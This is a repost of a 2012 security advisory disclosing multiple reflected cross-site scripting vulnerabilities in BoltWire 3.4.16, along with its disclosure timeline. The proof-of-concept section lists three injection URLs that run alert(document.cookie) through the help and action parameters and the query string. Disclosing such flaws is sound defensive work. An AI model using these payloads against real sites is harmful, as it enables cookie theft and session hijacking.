BoltWire 3.4.16 Cross Site Scripting

2012.01.17
Credit: Stefan Schurtz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: BoltWire 3.4.16 Multiple XSS vulnerabilities Advisory ID: SSCHADV2012-001 Author: Stefan Schurtz Affected Software: Successfully tested on BoltWire 3.4.16 Vendor URL: http://www.boltwire.com/ Vendor Status: informed ========================== Vulnerability Description ========================== BoltWire 3.4.16 is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script> http://[target]/bolt/field/index.php?"</a><script>alert(document.cookie)</script></ http://[target]/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg ========= Solution ========= - ==================== Disclosure Timeline ==================== 01-Jan-2012 - vendor informed 01-Jan-2012 - vendor feedback 15-Jan-2012 - no fix available ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt

References:

http://www.boltwire.com/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top